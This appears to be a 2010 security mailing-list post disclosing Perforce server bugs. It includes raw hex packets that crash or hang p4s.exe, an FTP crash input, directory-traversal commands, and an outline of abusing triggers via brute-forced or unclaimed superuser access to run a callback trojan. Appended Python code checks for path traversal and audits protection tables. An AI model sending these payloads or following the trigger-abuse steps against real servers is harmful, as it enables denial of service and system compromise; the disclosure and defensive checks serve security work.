Dailydave mailing list archives
Perforce
From: Intevydis <admin () vulndisco net>
Date: Thu, 04 Mar 2010 18:18:53 +0300
Hi,

Usually I tend to ignore articles related to "sophisticated" Aurora attacks, but according to http://www.wired.com/threatlevel/2010/03/source-code-hacks many companies use Perforce, big surprise..

About two years ago we performed a quick test of Perforce 2008.1 and released some bugs with Vulndisco:

1. p4s.exe DoS (crash)
to trigger, send the following data to port
    s="\x4c\xb3\xff\xff\xff\x63\x6d\x70\x66\x69\x6c\x65\x00\x00\x00\x00"
    s+="\x00\x00\x63\x6c\x69\x65\x6e\x74\x00\x02\x00\x00\x00\x36\x33\x00"

2. p4s.exe DoS (infinite loop)
to trigger:
    s="\x1b\x1b\x00\x00\x00\x63\x6d\x70\x66\x69\x6c\x65\x00\x00\x00\x00"
    s+="\x00\x00\x63\x6c\x69\x65\x6e\x74\x00\xdc\xff\xff\xff\x36\x33\x00"

3. another p4s.exe crash:
    s="\x4c\x4c\x00\x00\x00\x63\x6d\x70\x66\x69\x6c\x65\x00\x00\x00\x00"
    s+="\x00\x00\x63\x6c\x69\x65\x6e\x74\x00\x02\x00\x00\x00\x36\x33\x00"
    s+="\x61\x70\x69\x00\x0c\xff\xff\xff\x39\x39\x39\x39\x39\x00\x73\x6e"
    s+="\x64\x62\x75\x66\x00\x05\x00\x00\x00\x36\x35\x35\x33\x36\x00\x66"
    s+="\x75\x6e\x63\x00\x08\x00\x00\x00\x70\x72\x6f\x74\x6f\x63\x6f\x6c"
    s+="\x00"

4. Perforce FTP server null ptr crash
to trigger - "MKD x\r\n"

5. Perforce dir traversal
Trivial bug, on Windows it is possible to create files outside of the repository directory, something like:
    $ echo TESTTEST > "..\\..\\..\\..\\..\\..\\..\\test.txt"
    $ p4 add "..\\..\\..\\..\\..\\..\\..\\test.txt"
    //depot/..\..\..\..\..\..\..\test.txt#1 - opened for add
    $ p4 submit
on a Windows box the file C:\test.txt,v will be created

6. remote exploit
We've exploited the triggers feature of the Perforce server; triggers allow us to run external OS commands. To use this bug you will need an account with 'super' privileges; how you can get it:
  1. easy way - there is an empty protection table, so the first user who runs 'p4 protect' will be superuser (another nice feature of Perforce)
  2. hard way - run 'p4 protects', see who has super privileges and brute force his account
So, in our exploit we've been using the 'form-in' trigger; it will be fired each time we try to define a new client ('p4 client'). Our trigger saves a mosdef callback trojan in /tmp and executes it.

Of course all these bugs might be fixed now - no surprise, we found them ~2 years ago.

Do not get me wrong, our Perforce skill level is nothing compared to McAfee experts, we are just script kiddies playing with Wireshark and netcat.

Regards,
Evgeny L.

_______________________________________________
Dailydave mailing list
Dailydave () lists immunitysec com
http://lists.immunitysec.com/mailman/listinfo/dailydave
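Two defender-side checks for items 5 and 6 of the post, added here as an illustration; this is not code from the original post and not Perforce's own code. The path guard assumes the depot root and the client-supplied file path are plain path strings and resolves them with Python's ntpath/posixpath modules, so `..` segments, mixed separators and drive letters behave as the server's file system would. The protections audit assumes the tab-indented "Protections:" block as printed by `p4 protect -o`; the sample form and the empty form below are constructed, not captured from a real server.

```python
"""Constructed example: a path-containment guard and a protection-table audit."""
import ntpath
import posixpath
import re


def is_inside_root(root, candidate, windows=True):
    """Return True if `candidate`, resolved against `root`, cannot leave `root`.

    The OS-specific path module is chosen explicitly so the check can be run
    for a Windows server from a non-Windows host.
    """
    p = ntpath if windows else posixpath
    root_n = p.normcase(p.normpath(root))
    target = p.normcase(p.normpath(p.join(root, candidate)))
    # An absolute candidate (e.g. a different drive) replaces the root in join(),
    # so it fails the prefix test below; a `..` chain is collapsed by normpath().
    return target == root_n or target.startswith(root_n + p.sep)


# One protection line: mode, user|group, name, host, depot path.
_PROTECT_LINE = re.compile(
    r"^\s*(?P<mode>\S+)\s+(?P<kind>user|group)\s+(?P<name>\S+)\s+(?P<host>\S+)\s+(?P<path>\S+)"
)


def audit_protections(form_text):
    """Summarise a `p4 protect -o` form (assumed layout, see lead-in).

    Returns a dict with:
      empty          - no protection lines at all; the post notes that with an
                       empty table the first caller of `p4 protect` becomes superuser
      super_entries  - (kind, name, host) tuples granted 'super'
      wildcard_super - 'super' granted to user '*' or group '*'
    """
    in_block = False
    entries = []
    for line in form_text.splitlines():
        if line.startswith("Protections:"):
            in_block = True
            continue
        if not in_block or not line.strip() or line.lstrip().startswith("#"):
            continue
        m = _PROTECT_LINE.match(line)
        if m:
            entries.append(m.groupdict())
    supers = [(e["kind"], e["name"], e["host"]) for e in entries if e["mode"] == "super"]
    return {
        "empty": not entries,
        "super_entries": supers,
        "wildcard_super": any(name == "*" for _, name, _ in supers),
    }


# Constructed sample inputs.
TRAVERSAL_PATH = r"..\..\..\..\..\..\..\test.txt"   # the relative path from item 5
SAMPLE_FORM = """\
# A Perforce Protections Specification (constructed sample).
Protections:
\twrite user * * //...
\tsuper user alice * //...
\tsuper user * 10.0.0.* //...
"""
EMPTY_FORM = "# constructed sample with no entries\nProtections:\n"


if __name__ == "__main__":
    root = r"C:\perforce\depot"
    for cand in (TRAVERSAL_PATH, r"src\main.c", r"D:\other.txt"):
        print(f"{cand!r:40} inside root: {is_inside_root(root, cand)}")
    print(audit_protections(SAMPLE_FORM))
    print(audit_protections(EMPTY_FORM))
```

Running the block reports the item-5 path as outside the root (it resolves to C:\test.txt), a normal client path as inside, and flags the wildcard 'super' line in the sample form; the empty form is reported as having no entries, which is the state the post describes.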